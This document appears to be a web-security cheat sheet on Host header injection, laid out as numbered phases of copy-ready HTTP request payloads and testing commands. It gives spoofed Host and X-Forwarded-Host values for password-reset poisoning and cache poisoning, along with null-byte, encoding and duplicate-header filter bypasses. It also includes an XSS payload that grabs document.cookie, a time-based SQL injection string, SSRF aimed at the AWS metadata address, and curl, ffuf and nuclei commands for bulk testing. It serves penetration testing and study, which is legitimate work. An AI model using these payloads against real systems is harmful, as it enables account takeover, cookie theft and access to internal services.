Host Header Injection Guide

Comprehensive guide to Host header manipulation techniques, from basic spoofing to advanced SSRF and DNS rebinding attacks.

17+ Techniques7 ToolsCopy Ready

Phase 0

Vulnerability Description

1What is Host Header Injection?

Host Header Injection = web vulnerability when app trusts Host header without validation

2Core mechanism of the attack

Attacker modifies Host header to make server believe it is handling a different domain

3Primary impacts

Impacts: Cache Poisoning, Password Reset Poisoning, Open Redirects, Bypass security controls

4Most critical impact

Severe cases: Full Account Takeover

Phase 1

Common 1: Spoofing with Malicious Domain (Most Common)

1Purpose: Make the application generate links pointing to the attacker's server

GET /reset-password HTTP/1.1
Host: attacker.com

Phase 2

Common 2: Adding a Prefix

1Purpose: Bypass filters that only check for the main domain

GET /admin.php HTTP/1.1
Host: attackertarget.com

Phase 3

Common 3: Absolute URL in Host

1Purpose: Trick URL generation and parsing logic

GET /admin.php HTTP/1.1
Host: https://target.com/admin.php

Phase 4

Common 4: Subdomain Bypass

1Purpose: Bypass simple validation that looks only for the main domain

GET /admin.php HTTP/1.1
Host: subdomain.target.com

Phase 5

Common 5: Leading Space / Tab

1Purpose: Exploit parsing inconsistencies in servers or proxies

GET /admin.php HTTP/1.1
 Host: target.com

Phase 6

Common 6: Different Port

1Purpose: Bypass port-based access controls

GET /admin.php HTTP/1.1
Host: target.com:8080

Phase 7

Common 7: X-Forwarded-Host (Very Important)

1Purpose: Many apps/proxies trust X-Forwarded-Host over Host header

GET /admin.php HTTP/1.1
X-Forwarded-Host: attacker.com

Phase 8

Common 8: Blank Host Header

1Purpose: Some servers default to first virtual host when Host is empty

GET /admin.php HTTP/1.1
Host:

Phase 9

Common 9: Multiple Host Headers

1Purpose: Exploit inconsistencies between frontend/backend parsing

GET /admin.php HTTP/1.1
Host: target.com
Host: attacker.com

Phase 10

Common 10: Using Server IP

1Purpose: Bypass virtual host routing or access controls using IP

GET /admin.php HTTP/1.1
Host: 192.0.2.1

Advanced 11

Advanced 1: Special Characters & Null Byte

1Purpose: Bypass filters using null bytes or special characters

Host: target.com%00.attacker.com

Advanced 12

Advanced 2: Path Traversal in Host

1Purpose: Exploit misconfigured apps that parse host as part of path

Host: ../../attacker.com

Advanced 13

Advanced 3: Encoded Host

1Purpose: Bypass validation using URL-encoded values

Host: %74%61%72%67%65%74.com

Advanced 14

Advanced 4: XSS via X-Forwarded-Host

1Purpose: Inject XSS payload via X-Forwarded-Host header

X-Forwarded-Host: evil.com"><img src=x onerror=prompt(document.cookie)>

Advanced 15

Advanced 5: SQL Injection via X-Forwarded-Host

1Purpose: Inject SQL payload via X-Forwarded-Host header

X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

Advanced 16

Advanced 6: SSRF via Host Header

1Purpose: Reach internal services via Host header manipulation

Host: internal-service.local

2Use case: SSRF to cloud metadata services

Target internal AWS metadata: Host: 169.254.169.254

Phase 17

Tool 1: cURL (Best for Manual Testing)

1#1 Test Host header injection manually

curl -I -H "Host: attacker.com" https://target.com

2#2 Test X-Forwarded-Host injection manually

curl -I -H "X-Forwarded-Host: attacker.com" https://target.com

Phase 18

Tool 2: Ffuf (Brute Force Domains)

1Fuzz Host header values with wordlist, match 200 status

ffuf -u https://target.com -H "Host: FUZZ" -w hosts.txt -mc 200

Phase 19

Tool 3: Nuclei (Automated Scanning)

1Fast automated vulnerability scanning with Nuclei templates

nuclei -u https://target.com -t x-forwarded.yaml

2CoffinXP Nuclei template for X-Forwarded-Host testing

https://github.com/coffinxp/nuclei-templates/blob/main/x-forwarded.yaml

Phase 20

Tool 4: Gau + Curl (Bulk Testing)

1Test multiple domains with custom Host header in bulk

cat domains.txt | while read url; do echo "[*] Testing $url"; curl -sk -H "Host: attacker.com" "$url" -I; done

Impact 21

Real-World Impact

1Attackers poison shared cache to serve malicious content to all users

#1: Cache Poisoning → Affects all users

2Victim receives password reset link pointing to attacker's server

#2: Password Reset Poisoning → Account theft

3Abuse Host header to redirect users to phishing sites

#3: Open Redirects

4Access admin panels or internal APIs via Host header manipulation

#4: Bypassing IP/Host-based Access Controls

5Chain with SSRF to reach internal metadata services or APIs

#5: SSRF to internal services

6Via header injection leading to injection vulnerabilities

#6: XSS & SQLi in some cases

Phase 22

Vulnerability Types Classification

1Entry level - Start here

Type: Basic Spoofing | Main Usage: Changing links & emails | Difficulty: Easy

2Intermediate - When basic methods blocked

Type: Filter Bypass | Main Usage: Null byte, Encoding, Prefix | Difficulty: Medium

3Intermediate - Exploit parsing inconsistencies

Type: Header Smuggling | Main Usage: Multiple Host, Leading Space | Difficulty: Medium

4Expert level - Chain multiple techniques

Type: Advanced Attacks | Main Usage: SSRF, XSS, SQLi, DNS Rebinding | Difficulty: Advanced

Phase 23

Practical Tip

1Step 1: Basic testing with common attacker domain

Always start with Host and X-Forwarded-Host using attacker.com

2Step 2: Apply filter evasion techniques when basic methods fail

If blocked, try bypass techniques (Null Byte, Encoding, Multiple Headers)

Tools

Tools & Resources

cURL

Best tool for manual Host header injection testing

Ffuf

Fast web fuzzer for brute-forcing Host header values

Nuclei Templates

CoffinXP Nuclei template for X-Forwarded-Host testing

Burp Suite

Professional web security testing with Host Header Injection scanner

OWASP Testing Guide

Official OWASP guide for testing Host Header Injection